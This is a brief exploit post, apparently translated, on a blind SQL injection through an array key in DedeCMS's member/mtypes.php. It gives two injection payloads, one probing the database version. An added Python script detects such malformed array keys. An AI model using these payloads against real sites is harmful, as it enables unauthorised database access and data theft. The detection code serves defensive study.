It requires magic_quotes_gpc = Off, so it is of limited practical use.

An injection vulnerability that occurs in an array key, which is somewhat interesting.

This is a blind injection, so it is more tedious, but it can be exploited all the same; a tool could be written to run it automatically.

http://www.xxx.com/dede/member/mtypes.php?dopost=save

exploit:
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
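
A detection-side check for the array-key pattern described above, as an added example that is not part of the original post and not DedeCMS code: it parses a form-encoded request body and flags array parameters whose bracketed key is not a plain integer or identifier. The function names, the allow-list and the benign sample body are assumptions made for illustration; the flagged sample is the first request from the post.

```python
import re
from urllib.parse import unquote_plus

# Assumption for this example: a legitimate array key is a short
# integer or identifier. Adjust to the keys the application really uses.
SAFE_KEY = re.compile(r"[A-Za-z0-9_]{0,64}")
BRACKETS = re.compile(r"(\[[^\[\]]*\])+")


def split_pairs(body):
    """Split a raw form-encoded body into decoded (name, value) pairs."""
    pairs = []
    for chunk in body.split("&"):
        if chunk:
            # Split on the first raw '=' before decoding, as a server would.
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def suspicious_keys(body):
    """Return (parameter, key) pairs whose array key fails the allow-list."""
    findings = []
    for name, _value in split_pairs(body):
        base, bracket, rest = name.partition("[")
        if not bracket:
            continue  # scalar parameter, no array key to inspect
        rest = "[" + rest
        if not BRACKETS.fullmatch(rest):
            # Unbalanced brackets or trailing data after the key.
            findings.append((base, rest))
            continue
        for key in re.findall(r"\[([^\[\]]*)\]", rest):
            if not SAFE_KEY.fullmatch(key):
                findings.append((base, key))
    return findings


# Constructed benign body, and the first request body from the post.
BENIGN = "dopost=save&mtypename[7]=friends&tags[]=a"
FROM_POST = ("dopost=save&mtypename[7' and (@`'` or (56%3D56/*sql inject here*/))"
             " and '3'%3D'3]=c4rp3nt3r")

if __name__ == "__main__":
    for sample in (BENIGN, FROM_POST):
        print(suspicious_keys(sample))
```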